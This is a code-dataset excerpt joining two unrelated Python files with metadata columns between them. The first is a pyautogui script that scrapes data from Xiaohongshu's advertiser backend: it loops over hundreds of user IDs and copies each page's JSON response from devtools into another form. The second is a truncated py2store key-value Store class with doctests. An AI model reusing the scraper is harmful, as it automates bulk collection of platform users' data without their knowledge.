e762ce8ac2b1dfc807c7b","5eed70c2000000000101d009","59b62f1550c4b47fbfa368d9","5a62f9d111be1020468e68ff","5929ce465e87e75abe746efb","55d0b6ba67bc6547caafbe59","5cdf637d000000000500b3eb","58c8d64750c4b44d9a2afd3a","59db0933de5fb42c49530bc7","594a2b7282ec3960a7c75397","5b1a483c4eacab4750894464","5e8edd00000000000100a0f0","5bb0ad0205d6950001986388","5d21a24e000000001600059a","5485b6fd2e1d9372740bb8b5","5accd952e8ac2b3f7d395312","5aabc26fe8ac2b5bc53f0ceb","5a96b48411be1018c6cb7f5a","56611373e00dd82a647e93b9","57e8df8a5e87e77e84d877de","58cea42d82ec39331b7997c5","5745c8726a6a6929a37987c9","5b2992634eacab381cdb94d3","58cb312b6a6a697d3c40c6c5","560de3d08a75e176c026bce4","563e2a56a40e184ae9dd0122","5bc61047bb6a850001289ce3","565d2636b8ce1a622fc2d334","557072a43fef9236a3a7f004","55fcc04262a60c3cd04e1036","55c5588a5894460f05895af3","55f8307ec2bdeb7467b561e6","55f2b91df5a2632b2c1d4286","5c260a220000000005034c1a","5850c39c82ec3966d92180f4","5657d0e1a40e18206298b0f2","5bcdcb10819a070001f7619e","5ff45bda000000000100887c","5a7651abe8ac2b47d28926ee","59239aa86a6a691c24955c6d","5ad151cbe8ac2b52fc2e12ce","5a4eec94e8ac2b4cb41b1785","554a1de0a46e9639a16e6975","5a6321c011be103b09d88110","5b2dc0444eacab24d7c893ab","5c5b7826000000001200eee3","5f4dc3d200000000010034d7","57bea2ab50c4b422fe1e5f92","5a43b2d511be1008e1f14dae","5583eb4e62a60c6304c01151","5a981e6911be103f408c070d","557113c262a60c3cd12b5edb","5d373caa00000000160217f2","5baa552b38cf6d000153546f","5c2224700000000005018202","58517cee50c4b41b776bb417","58dbaac782ec3913c9d1e9d5","5c4dca92000000001201aec0","5a7d3542e8ac2b6dae88d728","572491d04775a70a93be3271","592aca456a6a69570b603018","5942e94e50c4b4493b7b30f3","55b2d8cda75c951bcf225dbf","5ac747d2e8ac2b308410011f","572e9fd36a6a69408536b47e","5d4fe2570000000011010390","5ab8e0c6e8ac2b67e29c9961","56fd0fb54775a704ad189eb9","5a5693344eacab6247407016","550776d2a46e96138db80fe8","604a197c000000000100816a","5c866e34000000001000f487","57bd4c2182ec397c6035c79a","588e062e5e87e71afc7132fc","5a1908d44eacab7e370f11d2","5cda8054000000001801f4cf","584279446a6a697c18b0fd20","58957c9e82ec393823ea19c6","555eb504e58d13119503175a","58304a585e87e7618e17514c","5a500b784eacab26ade77940","59911bdfb1da144ad683cbb1","5d25e85d0000000010032b9d","561f8b3b62a60c03ff326e6c","557136a8c2bdeb16cc0ba006","5736068050c4b4492d911f8f","55cff0fbe4b1cf48c686e3ab","5bf898e8a424d7000173eab7","5658433c6a6a69734ba1171f","5935728450c4b43e0b47520f","5a9508524eacab53994527c4","570a3a86aed75813e06d5067","5bb88de5c751e00001926db2","5ab1e8e04eacab530e5b82a8","5aa6251111be103946f6a15f","5ee0f3b9000000000101e918","5c2ffac100000000050072bd","58fab8d45e87e7747c2fd7a2","5ff5663c0000000001006728","5b6d45c74cef870001e55960","5486268fd6e4a952f9c331a5","600041c4000000000100a2de","5a294d1f4eacab0d82fb459b","58baf2ea6a6a6931fdd6c855","5874a46e50c4b4220c7a2b62","5a2f761911be1056201741d5","5b8954ea27e3da000141ae50","5da31c3f0000000001007ab1","58eec89b82ec393965a1f51c","5881a69f3460945db3d3de65","58cd59bb50c4b42d2e7d8073","5ed61b930000000001002407","5a7302b211be107bb5f61c96","5f4847660000000001005a9b","56332cca03eb8457c67f5427","5ce4fcb7000000001003e169","5a8fd30d11be101e8524835f","55a9a1aac2bdeb7315c6dd69","57d6338350c4b45215e07419","5fc71a040000000001009fd5","5eeb5eb80000000001007432","58f4db166a6a69755f139b83","5512b70fb4c4d638f29b5869","5aa680eae8ac2b640dbfd51a","577f47de6a6a6914cb27c7a3","5c568720000000001a00b54f","571f54f9aed758415dba5c2e","5a007141e8ac2b01d7a1e4a8","5d917f6e000000000100664e","59feafa54eacab6c7bb2b0cc","55cb2b36a75c9560c3d14155","5ab131f74eacab792d68178a","5a87bdbe4eacab58d7e67be6","5582c9c367bc654694af161e","570cff3a84edcd49ebf57976","5daac8660000000001006ca7","583c3f2850c4b431f4ec732c","5657f388b8c8b4108b2e2c62","589c148b5e87e74af99170d4","59eb6b37e8ac2b73c443064a","5ac30b0f11be102c4a9ca613","59face1211be107932f90b40","5628e14aa40e180db9fb411b","5bb36548b71c980001a030db","5891e81b6a6a69096012a2eb","58b96599a9b2ed471c1bab31","5e3c01e50000000001004ff3","5fd897d70000000001004171","5b7176d70534150001da6470","54808b26d6e4a9617b300d2f","598c715350c4b4355cc4ffdf","5aa021114eacab1929228642","5a5203a24eacab18c418df8a","5b0e82cc11be104f35bd3614","5a192bb44eacab22c4dfc1dd","5cb427010000000017018af8","5d0c42fc000000001003ef53","55a48c97c2bdeb418537bacf","571d0251aed7586f02028994","5756a666a9b2ed7490a301b2","5beb2c11b231910001db312f","5fa52f8a000000000101f5ae","592cd7d55e87e74e3f69f242","5f883f52000000000100af03","56a51d49b8c8b42af9fc1edf","5acc75484eacab1f6e33c19b","5f17a980000000000101f1b1","5a0a66624eacab2cd3547c58","557c55873397db03afd818d7","5c4edd61000000001003936a","5b1b3cb0e8ac2b4436a707d3","586a711382ec390cc62c4a96","5ea4500f0000000001009522","607d25700000000001005592","5cfd213a000000001703153a","5a93f67be8ac2b7e5e8feae8","5759753c7fc5b869367bbbb4","5a80121111be10486c6b2be4","5cdcd8b0000000001202a0bb","5a07df6311be10155751c12a","5657b5b5cb35fb48a4fff781","5e7e1ecd00000000010032dc","5aabe4aee8ac2b6bf6afc90f","54465beed6e4a95c715c7c33","551b7c282e1d937f113c7ad0","5f0d0f35000000000101cf56","59fd95084eacab38f7fd9e8f","586e14545e87e7414c352423","56c51ff1aed7581d118f26de","570700b94775a7711a829fae","54314fd4d6e4a97ec30dbd38","5571de6562a60c6ee591e0d5","5c8b29e6000000001001a5d3","5d84ea7200000000010183a4","54ce63d02e1d935ac1b3fedf","59a5a1806a6a692e2ccb0e9d","54db4a49b4c4d628db5b61b9","5789c7606a6a696c749b487a","59285c4e5e87e74f68992155","5c1097f40000000007019054","5b653a176b58b732d63ba7eb","57a860e082ec396d6c3dc31a","552490b29c5a6e66fecb9668","526dcdb3b4c4d638b56bc659","5e0b8e940000000001007687","5b567c7c11be103cac1fe1b1","5c7fe440000000001203fce2","56ea4a7eaed75816698316c8","5767a9256a6a691ce8f21aff","602f6ee4000000000100999a","59d308ac44363b703553c085","5d566f0f000000000101a296","5b06c9e6f7e8b97064b39b17","565802a70bf90c37bdbc5853","5ba49b6ff6ed5c00015503aa","5ccc55760000000010031f66","55a094b162a60c6fb82d0f3c","5657ac90a40e185acc6f00f3","5bc362a405b0a800011533cf","5586174567bc656851ff33af","5c092b8b0000000007006aab","59dd64a444363b3b200fa59e","59eb1bfbe8ac2b3b97ee4ce5","5e2e3fa500000000010054f3","5c08c1600000000007012182","5ad2418411be103306c70421","5b20afcfe8ac2b43f5687016","5979e25bb1da14447fc85fc1","5c0a93f00000000005008be0","58a56b9482ec396b88629f4d","565e638bcb35fb1b0c287ac7","546e1ca4d6e4a94b4d79f2e1","5a1456d311be1030b1fd8f8c","5b02db1511be1073237e24f0","559147c3b7ba2201a3b4f9a9","5b9b49ec3263770001e00c92","58972a3882ec390ece02b4d1","5a77f95011be1001c8541cde","5afbff6011be105437b6784a","5b27a807e8ac2b67933f7ed7","54fe4797a46e964082ceebd3","5c5fe0720000000011026cc1","5dbb9e3f000000000100b750","58f3961550c4b40be6e4e0be","5e7f63130000000001006dca","5899b83f5e87e71d7b22ecc0","5e521f33000000000100b089","5c06603b000000000700ca12","5571d45322cfcd1d420e9f2b","5de72fad000000000100a1d2","56528d229eb5781638e94300","55e652ed67bc654a2ed07e7e","5ba70ac7b7329a00013fb5ee","58b8dc1c82ec39570c45573a","5b59f92e11be10604dd8427a","58fea24e5e87e7149ae8d116","5aaa2a594eacab315b268c7b","549182e6b4c4d672a7e6a142","5b8ba90f04cdcb0001bff8c2","5975f7cf5e87e722a845fdb0","577aeec33460941effaa3835","58b003e882ec393f0e92ea52","59b7e39250c4b413f546ee26","5aab19fee8ac2b0c38e04b26","5e5822b700000000010081ec","5507f667a46e96261d1fb44a","59c3382651783a7b1edfd1be","595ad63682ec392959b5d0f2","5a7c8c5711be1014cfd35ed7","551261a0b4c4d633f9d375dc","5a52cc7111be1053a77bb537","58217a106a6a69161d36bf15","585e995850c4b42a81d42125","5a2beaf111be105ed915ecc8","5ad0a01fe8ac2b77ace6f10d","5961998650c4b40808c7a305","599b9e646a6a6928e4704e34","574253e282ec394d0da8fb30","5b629a91e8ac2b49f77b03d7","5e080f9800000000010055ef","5e690971000000000100008f","55a3c4ec3397db3497acd799","5fd4b4e1000000000101f13f","5ca2013d000000001103f6c4","593fe9a582ec394434a56844","580c863050c4b42ecfa8c4e1","5c3dd90f0000000007000af1","584aeea350c4b452666eeb3a","604efd6b00000000010017bd","5f156a6a00000000010076a0","5b1d0c12e8ac2b19718e0d09","5be703b1e4034f0001275cc7","58934d6050c4b43d1ff65347","5a854a674eacab3edaab9279","6059741e000000000100bbb5","5c43e65d00000000050384ba","557321ca3397db5adad5a346","5c8f80b40000000012022ba0","553b4cca2e1d937b7a12f2a7","58be720350c4b41c25b9b9ca","5c595fcf000000001200d14a","58288bff5e87e70795fc1cb2","565887b8f53ee00b9b96ac68","56f8be7caed758091a6a2806","5b7fdacb47bf040001c315da","565076df67bc654bec5a105d","57eb3b6bbd0da52e60a75db7","5b1b54ae4eacab340721acb9","59e741a711be104632838490","5de477b40000000001001e9f","5d37cdb6000000001603e5f0","5ce11a7a000000001803fc51","5661019f44760806ac9f1f5f","5b2304ee4eacab328a9ef6af","5b19c3c0b1da144c9fb597c7","5b7ab84ae5cab2000190b10b","5b3a004711be102716da8911","57c1b9715e87e77896a49378","5a928a344eacab147782f73d","5dd354fd0000000001006134","5b0fe09c11be1078bca38cd0","5f2cca7f00000000010042c2","5e4576780000000001006e98","561b495933f60c668a6bbf89","559b6624e4b1cf396597808c","5ebd6bc40000000001002ae2","5c7384a80000000010038384","55263b88b203d93617b793e2","5659bd98172fe71c4ebde13a","5cb6ea70000000001200d7f6","55963b1a62a60c325cd4a221","5e1d68180000000001006fe8","5b2c6e2111be106f4e2dbd8b","5821eee950c4b44bf8c78172","593242e450c4b40dbda0287d","561bdf0962a60c07c62b8593","576e10db6a6a695347fe739e","6059f5d50000000001005c6c","59f1b43811be1073f052bf4e","5a30f414e8ac2b59f0435f2a","58fdd7c86a6a692edbb904d7","59e0be9520e88f79782649bb","5a38fe69e8ac2b39bb87e9ff","5c16067700000000050165cd","56d7dfe51c07df394bfcc1be","57e5eb9d6a6a691cdfb754ce","5be18dc5f1860900016ea082","5d25b56b000000001601c6c1","5e8070650000000001001dba","5c45a6930000000005024c67","5ffe650a0000000001003836","567597219eb5786c9d82f52e","5adecd92e8ac2b01532d7e91","5e57b6ee000000000100456e","5bdfbf81c05f190001cad6b9","58b040c76a6a6921fdcbc355","56b0f0d650c4b43580cfa5f4","5f312c85000000000101e3da","5a1886fa4eacab5fb7ea07eb","55209631d39ea24786bb047e","5523dcd1a46e966508cb05b5","587df4b482ec396d6d0b7c17","55d43af5c2bdeb5049bcbb94","5f0564be0000000001000229","556f1bb5f5a26347193b4933","5b023d5a11be102ae1f7659c","587da6f56a6a6955c688968b","5e9afaf100000000010057b5","5b4f0c0f11be10421f45d6f1","58691b8e50c4b435f158f283","5bcf348d868e9b0001117395","6035fb9f0000000001003cc0","54e00cddb4c4d61c8fd8acc0","5ed67d070000000001003fa6","54e4e5192e1d933296cfec7c","5909807e6a6a693b675c1e1a","5d6382c10000000001003746","5b8374b73ff3e5000186bcaa","571f2b424775a7205695d9ba","596c5d9050c4b413883138a0","5d7def4b000000000101b2c8","54930c40b4c4d6679f7b4702","57aed2e782ec3944f77936ba","5ab8de4311be103c8667537b","563c5250e58d137011493f90","5837c16682ec392ed10546ec","576b19a66a6a6971d122e237","5cb34eb4000000001703e1cf","603a5bda000000000101cda0","5980792982ec39296bfd66f6","5eb154780000000001002e67","58958a686a6a696a4c52894f","59c25b3a44363b437753ac94","544d14b1d6e4a977d7e61228","5ae6be514eacab2d6388cc12","5c89e6ef000000001603ad73","5bdc43074fd2ce000162569d","5b67dccdbf34890001c517c6","5f044d3b000000000100205c","569b1645e4251d4f8dde80fc","58c1746950c4b446d8e573a2","5d7e4038000000000100147d","5874fbdf6a6a69151882aee7","56a608926a6a696ef905f17b","56528b2ea40e180534b4d126","5883b4d950c4b420f6ac28b9","54e9bca94fac63087d2321ee","5b40941d11be1032e7225b61","59e8614811be1076e7c0b1ab","5c2795bd0000000007021b41","57b852256a6a6942aaebe71d","5f66c2f40000000001008806","56442f90f53ee01f3d33a8f3","5a958ed04eacab12b308a055","5b05596e4eacab2bd791465d","56cd46d6aed758456431ea82","5f6edd440000000001000832","5ea1754c0000000001005b4e","58dd1aeb6a6a69306cd12cad","5bcc0bbf08e1b90001856519","596620885e87e760f584e871","55584ec55894467d4ddf7356","56cfba38aed75872829f2567","558d1d3fb7ba2262710af891","587e285a82ec392bdf0b7bab","5fec194100000000010087d7","5f00887500000000010012c7","56ab6678aed75813220f1e9f","5b77dbd18bbbef0001079661","566fcb24b8c8b42ed484a8ed","5afd7b394eacab09023fea1e","5bb2e9f9b0eb9900019e6d5c","53f82345b4c4d66e58ea1218","5aefadd34eacab49b1c47089","5a0d6d0211be106ac5a3068f","5c37804b0000000007025491","5653de7c82718c3bb105b9aa","565ecee203eb841d09b3a20d","53a2666eb4c4d6706a81da68","540ade4eb4c4d665976d0e02","5c220bd100000000070106f2","5a2ce2f811be1046673ac90d","5c2b885f000000000502dea7","5fab19e40000000001009e8b","5aa53fda4eacab65fe33dcc1","5572923d5894460f7ee442a2","5767625e5e87e74d61f1f24f","550cfc13d39ea256b3c91a8b","5c153ac400000000050332ca","5ede37d10000000001004fff","567ad0c150c4b4166b3e0f21","5e21ac340000000001001156","5d8df57b000000000101855b","5f2284a90000000001004ccf","5827dd8a82ec393f1be0dbcb","5992aa4650c4b45e52a01a72","5f24dcbc00000000010077f5","5b8a97aec32e0700012bd500","5b3974a311be105037eb89d8","5c9081c5000000001603914d","55aa67e667bc654991abfc37","556c77935894460d91e7419e","5b66f5ab8988dc000161ac69","5a8d636c11be107b053058c0","5a0248804eacab7eb27c7768","60502dcb00000000010078a6","58db120c82ec394d0c460d3a","55d9b871a75c9574077e2717","5f2fb9ac0000000001003ffc","556836a767bc65799f06d72c","554c271fb203d90ce6bae2f1","5b42f46f11be104776370416","547bdc01d6e4a94c0f8615c5","5c3de675000000000601fdf7","5999481750c4b4056f3f0c11","57b1c0525e87e70b6eb5c64a","5abb01d4e8ac2b656f29e14c","5b0d2b4211be10274aab3eb7","5fb7691e000000000100292d","59847f3b5e87e73fdabd328e","5df87fa90000000001000391","5c00e24200000000070024a2","5e5f3430000000000100196a","5c88b5680000000010000efd","607415d3000000000101da72","59bd44f544363b6bfcd3dbc1","5ae34a5e4eacab25c63af892","530ee268b4c4d634fa4f4d1e","55d9e21bb7ba227f315f4194","59ea8697e8ac2b35baa266d6","55dddd47b7ba220fd3aa3c14","565445c2e58d1316083f484e","5f4c99eb0000000001005b17","56586f3350c4b421251dfdb5","5b1ba6fc11be104fec134cb3","5e93ffa20000000001006237","587e923450c4b40f2151bc60","5c6ce9cb000000001003b6f4","5960514582ec3959f52025a0","5c70b58a000000001201b5d1","5993ba0082ec391f528fbffb","5afa97dd11be1029aa1e147c","5c6d65f200000000120255fb","5a3dd4d4e8ac2b5123bfbb80","5b515b0a11be105661e18be8","5c4dbe89000000001101586a","5d14afa400000000110206e3","5c6c2c05000000001001cacb","5713a321aed7584bfe3495b6","587ce5ce5e87e767ad00d90c","5e9e893a0000000001007752","5f4a03d00000000001000307","5fcb4b1400000000010025fd","5c413c5200000000060061cd","5a9105b1b1da143096856dc6","566a22b94476083970356a74","5a6580cc11be1042cd541038","5c7f22d8000000001103332b","5aefbad811be103e49856478","5e5cd140000000000100b20c","5dbcf6b20000000001008e3c","5482d2492e1d932ed9aadb6a","5a453d8111be1020f513c524","5b65a183b7f0820001e1c7ed","5e73108c0000000001008d74","5937d33b6a6a6937f77f0a1c","5d8562e20000000001019df8","555801ad5894467d3ddf64fd","5a8a5ae611be1014a4547bc2","5a946c1d4eacab7c3c64a74c","599757555e87e73b3c3cf2a2","5b21d42811be101e65b18841","5dbb61d70000000001003295","55725943b7ba2257ddfd3640","5a19761de8ac2b21a8dde21e","5a466808e8ac2b4d52998a08","5a0165b34eacab0afcf4e9b1","591f1ba16a6a695526db1638","5ace1162e8ac2b344fd15b0a","5b294214e8ac2b22e2e64c9f","598fbb9982ec3920677a38e4","58e3879482ec390f71ee8ef6","55ba3d26c2bdeb17dc88b4d2","553252e6d39ea220cdbd110c","5bb3067f05d69500010ca365","5794f10850c4b418fb10550a","5aa4c8964eacab38da4e0a10","58617edf6a6a6973bd71148e","5acdde5fe8ac2b345c29fdd2","5ba52217f7e8b908d5ab3c3c","578625c982ec3970bbf6a7af","5b658e44423b0a0001d81e8f","5f81a2d4000000000101eb38","5c8e6e1300000000110248b8","54941571b4c4d667967b4709","5572a2265894460ed8b7bbf7","594952b96a6a691f49dcb6c4","5a98dcde4eacab303d56657c","5895fbd96a6a6975b95289b9","5a6b37de11be102adb012778","5a5eaa3011be105d993b4942","5c6fb515000000001001fd7d","59eb425ae8ac2b649a87caac","5a9040de4eacab5c78abffa5","5a6817e611be1054a2061909","59466afd50c4b42d72f056fe","55e25019e4b1cf338dd9e11c","601e7087000000000100b595","5dfa1be30000000001000fe6","5b1d5077e8ac2b3a063d0531","59d80f2d6eea8853b109bb28","5d15a5cc0000000012017df0","5bbccfc44bcb9c00014bf727","58a083195e87e74b7c5e36ca","5aa7fc6be8ac2b19e96ca658","572d424c5e87e70316c49fd2","54bb1325e779892bd39f28d3","56d628751c07df1335bdba86","5bd959be11429c0001af5330","5657c790f53ee025b7a6932c","55cb696967bc65612c624a51","5aa351b011be1074bd1a6bd0","5aae0dcf4eacab7e257f6cc6","5657c17d9eb5785c93f475ea","603cdba8000000000100b906","606e6f090000000001001332","596594a150c4b4471045704a","56eea01f4775a738c69f1e7a","5e59ca590000000001008ff3","59c8b19444363b3bfdabd39a","5cac20f50000000016037d36","5902a75550c4b47ab258c72e","5b48cf6de8ac2b726e8b3c38","5bb0941486045400015aa7de","58f02a3e50c4b46a50749c03","56d2ebe684edcd0dd5daa9d6","56a32c3882ec393f52a93b90","5ece23ae00000000010040ea","5b4d8b84e8ac2b205f0f56b6","5a72a31911be1055a50fa572","5fa56b5c000000000100ad2b","564d40940bf90c7f11300b15","5cdc1268000000001800ce94","5f250b1c0000000001003339","5ad15590e8ac2b238a8462b1","5bc9cd54b39f660001fd1827","548b0e80b4c4d651c754c22e","59c069fd44363b75d0e43733","57d4faed6a6a69393f0b6cb1","5fdeef3a00000000010032ba","5885804c82ec3918647ed46a","60caf0ff000000000101e43f","56571e5eb8c8b4178e7fbaaa","5afa359df7e8b9300f8709db","5bcb9c2371717b0001f9f3c0","57e5d30da9b2ed5934159b3c","55f12037f5a2636b0e7933cc","56a5fc89cb35fb7310b56278","570082bc84edcd46220bf1fb","5fb2a6db0000000001004da0","5573e5060bf90c61b2b6e93a","576cbdde50c4b43b2685ca2c","5df7209e0000000001008303","6066fc73000000000101c5d3","597082e76a6a6922e2ef061e","5be28cb3b9442e00014c4baf","5dd020de0000000001005f57","5c405df2000000000703ec1d","56471ec09eb5783016d49126","5a19592f11be105dc8f0701a","5e9a73f50000000001004b63","5da975540000000001005883","5a5ecfa54eacab7340101723","58a01a696a6a691e5b063cfd","5b19f45ae8ac2b2d854cc346","5d27f60000000000110206d9","5f59eae000000000010075a5","5baee504f3509b0001314603",]
# userIds=["563f28159eb5785cf3ff166c"]
num=0
for userId in userIds:
url = "https://pgy.xiaohongshu.com/solar/advertiser/kol/%s"%userId
print(url)
#点击小红书抬头
pyautogui.moveTo(x=150, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=150, y=20,clicks=1, button='left')
pyautogui.sleep(2)
#点击搜索框,
pyautogui.moveTo(x=300, y=66,duration=0, tween=pyautogui.linear)
pyautogui.click(x=300, y=66,clicks=1, button='left')
pyautogui.sleep(2)
pyautogui.hotkey("ctrl","a")
pyautogui.typewrite(url)
pyautogui.press("enter")
pyautogui.sleep(2)
#search输入uid
pyautogui.moveTo(x=1270, y=214,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1270, y=214,clicks=1, button='left')
pyautogui.sleep(1)
pyautogui.hotkey("ctrl","a")
pyautogui.typewrite(userId)
pyautogui.press("enter")
#seach选第二个
pyautogui.moveTo(x=1270, y=421,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1270, y=421,clicks=1, button='left')
pyautogui.sleep(1)
#删除
pyautogui.moveTo(x=1388, y=213,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1388, y=213,clicks=1, button='left')
pyautogui.sleep(1)
#点respone
pyautogui.moveTo(x=1700, y=439,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1700, y=439,clicks=1, button='left')
pyautogui.sleep(1)
#点数据
pyautogui.moveTo(x=1700, y=468,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1700, y=468,clicks=1, button='left')
pyautogui.sleep(1)
pyautogui.hotkey("ctrl","a")
pyautogui.hotkey("ctrl","c")
pyautogui.sleep(1)
#删除response
pyautogui.moveTo(x=1462, y=176,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1462, y=176,clicks=1, button='left')
pyautogui.sleep(1)
#抓取json
pyautogui.moveTo(x=445, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=445, y=20,clicks=1, button='left')
pyautogui.sleep(1)
#粘贴json
pyautogui.moveTo(x=443, y=216,duration=0, tween=pyautogui.linear)
pyautogui.click(x=443, y=216,clicks=1, button='left')
pyautogui.hotkey("ctrl","v")
pyautogui.sleep(1)
#点击submit
pyautogui.moveTo(x=466, y=320,duration=0, tween=pyautogui.linear)
pyautogui.click(x=466, y=320,clicks=1, button='left')
pyautogui.sleep(1)
#返回原页面
pyautogui.moveTo(x=140, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=140, y=20,clicks=1, button='left')
pyautogui.sleep(1)
num = num+1
print(num)
| 364.930556
| 23,770
| 0.869153
| 1,246
| 26,275
| 18.32825
| 0.763242
| 0.008583
| 0.008407
| 0.012086
| 0.049612
| 0.044796
| 0.042738
| 0.034286
| 0.023164
| 0.020099
| 0
| 0.56675
| 0.014462
| 26,275
| 71
| 23,771
| 370.070423
| 0.315157
| 0.004453
| 0
| 0.345455
| 0
| 0
| 0.813052
| 0.807926
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018182
| 0
| 0.018182
| 0.036364
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b426e31b9a2c873b8f1cb5b9f374168279b497e
| 14,675
|
py
|
Python
|
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
from py2store.base import Persister, static_identity_method, Item, Key, Val, no_such_item, KeyIter
class Store(Persister):
"""
By store we mean key-value store. This could be files in a filesystem, objects in s3, or a database. Where and
how the content is stored should be specified, but StoreInterface offers a dict-like interface to this.
__getitem__ calls: _id_of_key _obj_of_data
__setitem__ calls: _id_of_key _data_of_obj
__delitem__ calls: _id_of_key
__iter__ calls: _key_of_id
>>> # Default store: no key or value conversion ################################################
>>> s = Store()
>>> s['foo'] = 33
>>> s['bar'] = 65
>>> assert list(s.items()) == [('foo', 33), ('bar', 65)]
>>> assert list(s.store.items()) == [('foo', 33), ('bar', 65)] # see that the store contains the same thing
>>>
>>> ################################################################################################
>>> # Now let's make stores that have a key and value conversion layer #############################
>>> # input keys will be upper cased, and output keys lower cased ##################################
>>> # input values (assumed int) will be converted to ascii string, and visa versa #################
>>> ################################################################################################
>>>
>>> def test_store(s):
... s['foo'] = 33 # write 33 to 'foo'
... assert 'foo' in s # __contains__ works
... assert 'no_such_key' not in s # __nin__ works
... s['bar'] = 65 # write 65 to 'bar'
... assert len(s) == 2 # there are indeed two elements
... assert list(s) == ['foo', 'bar'] # these are the keys
... assert list(s.keys()) == ['foo', 'bar'] # the keys() method works!
... assert list(s.values()) == [33, 65] # the values() method works!
... assert list(s.items()) == [('foo', 33), ('bar', 65)] # these are the items
... assert list(s.store.items()) == [('FOO', '!'), ('BAR', 'A')] # but note the internal representation
... assert s.get('foo') == 33 # the get method works
... assert s.get('no_such_key', 'something') == 'something' # return a default value
... del(s['foo']) # you can delete an item given its key
... assert len(s) == 1 # see, only one item left!
... assert list(s.items()) == [('bar', 65)] # here it is
>>>
>>> # We can introduce this conversion layer in several ways. Here's a few... ######################
>>> # by subclassing ###############################################################################
>>> class MyStore(Store):
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
>>> s = MyStore(store=dict()) # note that you don't need to specify dict(), since it's the default
>>> test_store(s)
>>>
>>> # by assigning functions to converters ##########################################################
>>> class MyStore(Store):
... def __init__(self, store, _id_of_key, _key_of_id, _data_of_obj, _obj_of_data):
... super().__init__(store)
... self._id_of_key = _id_of_key
... self._key_of_id = _key_of_id
... self._data_of_obj = _data_of_obj
... self._obj_of_data = _obj_of_data
...
>>> s = MyStore(dict(),
... _id_of_key=lambda k: k.upper(),
... _key_of_id=lambda _id: _id.lower(),
... _data_of_obj=lambda obj: chr(obj),
... _obj_of_data=lambda data: ord(data))
>>> test_store(s)
>>>
>>> # using a Mixin class #############################################################################
>>> class Mixin:
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
...
>>> class MyStore(Mixin, Store): # note that the Mixin must come before Store in the mro
... pass
...
>>> s = MyStore() # no dict()? No, because default anyway
>>> test_store(s)
>>>
>>> # adding wrapper methods to an already made Store instance #########################################
>>> s = Store(dict())
>>> s._id_of_key=lambda k: k.upper()
>>> s._key_of_id=lambda _id: _id.lower()
>>> s._data_of_obj=lambda obj: chr(obj)
>>> s._obj_of_data=lambda data: ord(data)
>>> test_store(s)
"""
# __slots__ = ('_id_of_key', '_key_of_id', '_data_of_obj', '_obj_of_data')
def __init__(self, store=dict):
if isinstance(store, type):
store = store()
self.store = store
_id_of_key = static_identity_method
_key_of_id = static_identity_method
_data_of_obj = static_identity_method
_obj_of_data = static_identity_method
# Read ####################################################################
def __getitem__(self, k: Key) -> Val:
return self._obj_of_data(self.store.__getitem__(self._id_of_key(k)))
def get(self, k: Key, default=None) -> Val:
data = self.store.get(self._id_of_key(k), no_such_item)
if data is not no_such_item:
return self._obj_of_data(data)
else:
return default
# Explore ####################################################################
def __iter__(self) -> KeyIter:
return map(self._key_of_id, self.store.__iter__())
def __len__(self) -> int:
return self.store.__len__()
def __contains__(self, k) -> bool:
return self.store.__contains__(self._id_of_key(k))
def head(self) -> Item:
for k, v in self.items():
return k, v
# Write ####################################################################
def __setitem__(self, k: Key, v: Val):
return self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
# Delete ####################################################################
def __delitem__(self, k: Key):
return self.store.__delitem__(self._id_of_key(k))
def clear(self):
raise NotImplementedError('''
The clear method was overridden to make dangerous difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass''')
# Misc ####################################################################
def __repr__(self):
return self.store.__repr__()
class StoreLessDunders(Persister):
"""
Same as Store above, but where some of the dunder references in the code were replaced by functions themselves.
This what suggested by Martijn Pieters (no sure why, again).
doctests pass, but don't see a significant or consistent improvement in speed
self._obj_of_data(self.store.__getitem__(self._id_of_key(k)))
--> self._obj_of_data(self.store[self._id_of_key(k)])
map(self._key_of_id, self.store.__iter__())
--> map(self._key_of_id, iter(self.store))
self.store.__len__()
--> len(self.store)
self.store.__contains__(self._id_of_key(k))
--> self._id_of_key(k) in self.store
self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
--> self.store[self._id_of_key(k)] = self._data_of_obj(v)
# Note that there's a difference here, since in the old way, a value COULD be returned (if __setitem__ did)
self.store.__delitem__(self._id_of_key(k))
--> del self.store[self._id_of_key(k)]
# Same comment about no return value for __setitem__
self.store.__repr__()
--> repr(self.store)
>>> Store = StoreLessDunders
>>> # Default store: no key or value conversion ################################################
>>> s = Store()
>>> s['foo'] = 33
>>> s['bar'] = 65
>>> assert list(s.items()) == [('foo', 33), ('bar', 65)]
>>> assert list(s.store.items()) == [('foo', 33), ('bar', 65)] # see that the store contains the same thing
>>>
>>> ################################################################################################
>>> # Now let's make stores that have a key and value conversion layer #############################
